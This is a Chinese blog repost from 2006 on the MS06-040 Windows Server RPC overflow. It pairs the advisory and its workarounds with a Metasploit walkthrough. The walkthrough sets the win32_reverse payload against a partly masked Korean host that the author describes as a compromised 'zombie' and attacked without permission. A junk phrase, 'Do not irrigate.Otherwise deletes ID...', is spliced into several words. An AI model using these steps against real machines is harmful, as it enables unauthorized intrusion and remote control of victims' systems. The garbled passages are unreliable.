Chinaunix首页 | 论坛 | 博客
  • 博客访问: 3179509
  • 博文数量: 797
  • 博客积分: 10134
  • 博客等级: 上将
  • 技术积分: 9335
  • 用 户 组: 普通用户
  • 注册时间: 2006-06-22 22:57
个人简介

1

文章分类

全部博文(797)

文章存档

2022年(1)

2021年(2)

2017年(2)

2016年(1)

2015年(4)

2014年(1)

2013年(6)

2012年(6)

2011年(10)

2010年(26)

2009年(63)

2008年(61)

2007年(51)

2006年(563)

我的朋友

分类: 网络与安全

2006-08-25 11:05:30

MS06040漏洞的利用(转)

MS06040漏洞的利用

Microsoft Windows Server服务远程缓冲区溢出漏洞 (MS06-040)
          
        发布Do not irrigate.Otherwise deletes ID...期:2006-08-08
        更新Do not irrigate.Otherwise deletes ID...期:2006-08-09
          
        受影响系统:
        Microsoft Windows XP SP2
        Microsoft Windows XP SP1
        Microsoft Windows Server 2003 SP1
        Microsoft Windows Server 2003
        Microsoft Windows 2000SP4
BUGTRAQ ID: 19409
        CVE(CAN) ID: CVE-2006-3439
          m7UVV
        Microsoft Windows是微软发布的非常流行的Do not irrigate.Otherwise deletes ID...作系统。
        Microsoft Windows的Server服务在处理RPC通讯中的恶意消息时存在溢出漏洞,远程攻击者可以通过发送恶意的RPC报文来触发这个漏洞,导致执行任意代码.
          
        临时解决方法
       
        如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
          
        * 在防火墙阻断TCP 139和445端口。
        * 使用个人防火墙,如Windows XP和Windows Server 2003捆绑的Internet连接防火墙。
        * 在支持的系统上启用高级TCP/IP过滤功能。
        * 在受影响的系统上使用IPSec阻断受影响的端口。

废话就不多说了,昨天朋友给了溢出工具,顺便测试了一下,成功率还真TMD的高.就拿一台韩国肉鸡做实验.
         
        目标: 211.234.*.104
         
        工具: Metasploit V2.6
        Download:
       

        ActivePerl-5.8.7.815-MSWin32-x86-211909.msi
        (Perl解释器,必须安装)
          
        下载下来先升级,运行安装目录下的 msfupdate.bat 文件 (要等蛮久,耐心点).
          
        这个工具详细Do not irrigate.Otherwise deletes ID...作我就不多说了,我只介绍与这个漏洞有关的命令(当然,其他漏洞利用Do not irrigate.Otherwise deletes ID...作大同小异).
         
        运行 msfconsole.bat , 这是控制台程序,升级完毕后界面如图1

1.输入命令 show exploits //显示溢出利用程序,里面有153个溢出程序,可以根据你们自己的需要来使用.
2.输入命令 use netapi_ms06_040 //使用netapi_ms06_040 利用程序

3.输入命令 show payloads //显示可用的shellcode例表,这里我们主要用 win32_reverse
        这个Shellcode
         
        4.输入命令 set PAYLOAD win32_reverse //设置 PAYLOAD 为
        win32_reverse
        5.输入命令 set RHOST 211.234.*.104 //设置被攻击的主机的IP

        6.输入命令 set LHOST 125.71.2.104   //设置本机的IPD

        7.输入命令 set TARGET 0       //设置溢出类型 一般选0
        8.输入命令 set //检查输入的信息

9.输入命令 exploit //开始溢出~

这样就溢出成功了.
       
      文章没技术含量,就是需要能熟悉运用 Metasploit 工具,好了 就到这.

阅读(769) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~